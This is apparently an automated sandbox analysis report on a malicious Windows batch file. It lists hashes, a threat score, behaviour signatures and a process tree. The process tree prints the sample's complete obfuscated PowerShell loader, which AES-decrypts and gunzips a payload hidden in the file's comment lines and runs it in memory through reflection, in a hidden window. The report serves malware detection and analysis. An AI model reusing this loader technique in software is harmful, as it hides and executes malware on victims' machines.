Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28-01-2025 05:55
Static task
static1
Behavioral task
behavioral1
Sample
3394df243b24f41c13e7c1e37be4285ff662cd969fa653f377b1f984ee474a0b.bat
Resource
win7-20240903-en
4 signatures
150 seconds
General
-
Target
3394df243b24f41c13e7c1e37be4285ff662cd969fa653f377b1f984ee474a0b.bat
-
Size
3.4MB
-
MD5
f06fd82f34a91ec7ec3a2f242daa5699
-
SHA1
31625c87b890569ab23b1556d37400deefbbe03c
-
SHA256
3394df243b24f41c13e7c1e37be4285ff662cd969fa653f377b1f984ee474a0b
-
SHA512
31b7e30d6d3194eb83619b8006d38a87e4cb807aadc284f1c4acc5c03f701a154bad50a13a730b211443f9730c46e15b13c00f4b3994b53261efc17fd685b50a
-
SSDEEP
24576:ouCQ1lZkZ4Cs5O1MvmcQX4oZZtOHiBmXj5vAj/oSpaCj76RzfkvS9GnWN+uuQG48:+EHLmI4OH9mjra3avfWIdW1M399qlY
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2504 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2504 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2504 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2124 wrote to memory of 2496 2124 cmd.exe 31 PID 2124 wrote to memory of 2496 2124 cmd.exe 31 PID 2124 wrote to memory of 2496 2124 cmd.exe 31 PID 2124 wrote to memory of 2504 2124 cmd.exe 32 PID 2124 wrote to memory of 2504 2124 cmd.exe 32 PID 2124 wrote to memory of 2504 2124 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\3394df243b24f41c13e7c1e37be4285ff662cd969fa653f377b1f984ee474a0b.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function LLppO($CPtuP){ $YqYGn=[System.Security.Cryptography.Aes]::Create(); $YqYGn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $YqYGn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $YqYGn.Key=[System.Convert]::FromBase64String('nKDQKPFRDB4UaeLOndYu+4k+Q0wQVZw47HPOfUUgfBg='); $YqYGn.IV=[System.Convert]::FromBase64String('UfEYRi/5OKMR5zSX3oNZ8w=='); $BfudD=$YqYGn.CreateDecryptor(); $SnIMa=$BfudD.TransformFinalBlock($CPtuP, 0, $CPtuP.Length); $BfudD.Dispose(); $YqYGn.Dispose(); $SnIMa;}function OnLZm($CPtuP){ IEX '$rTpAl=New-Object System.IO.M*em*or*yS*tr*ea*m(,$CPtuP);'.Replace('*', ''); IEX '$Zfmrm=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$HkwXH=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($rTpAl, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $HkwXH.CopyTo($Zfmrm); $HkwXH.Dispose(); $rTpAl.Dispose(); $Zfmrm.Dispose(); $Zfmrm.ToArray();}function IgGdL($CPtuP,$sHjZk){ IEX '$GqVau=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$CPtuP);'.Replace('*', ''); IEX '$jCGEA=$GqVau.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jCGEA.*I*n*v*o*k*e*($null, $sHjZk);'.Replace('*', '');}$jvfbU = 'C:\Users\Admin\AppData\Local\Temp\3394df243b24f41c13e7c1e37be4285ff662cd969fa653f377b1f984ee474a0b.bat';$host.UI.RawUI.WindowTitle = $jvfbU;$LDiXZ=[System.IO.File]::ReadAllText($jvfbU).Split([Environment]::NewLine);foreach ($YMuuu in $LDiXZ) { if ($YMuuu.StartsWith(':: ')) { $qgoDd=$YMuuu.Substring(3); break; }}$cHpKY=[string[]]$qgoDd.Split('\');IEX '$kTXqv=OnLZm (LLppO ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($cHpKY[0])));'.Replace('*', '');IEX '$OpwNO=OnLZm (LLppO ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($cHpKY[1])));'.Replace('*', '');IgGdL $kTXqv $null;IgGdL $OpwNO (,[string[]] ('')); "2⤵PID:2496
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2504
-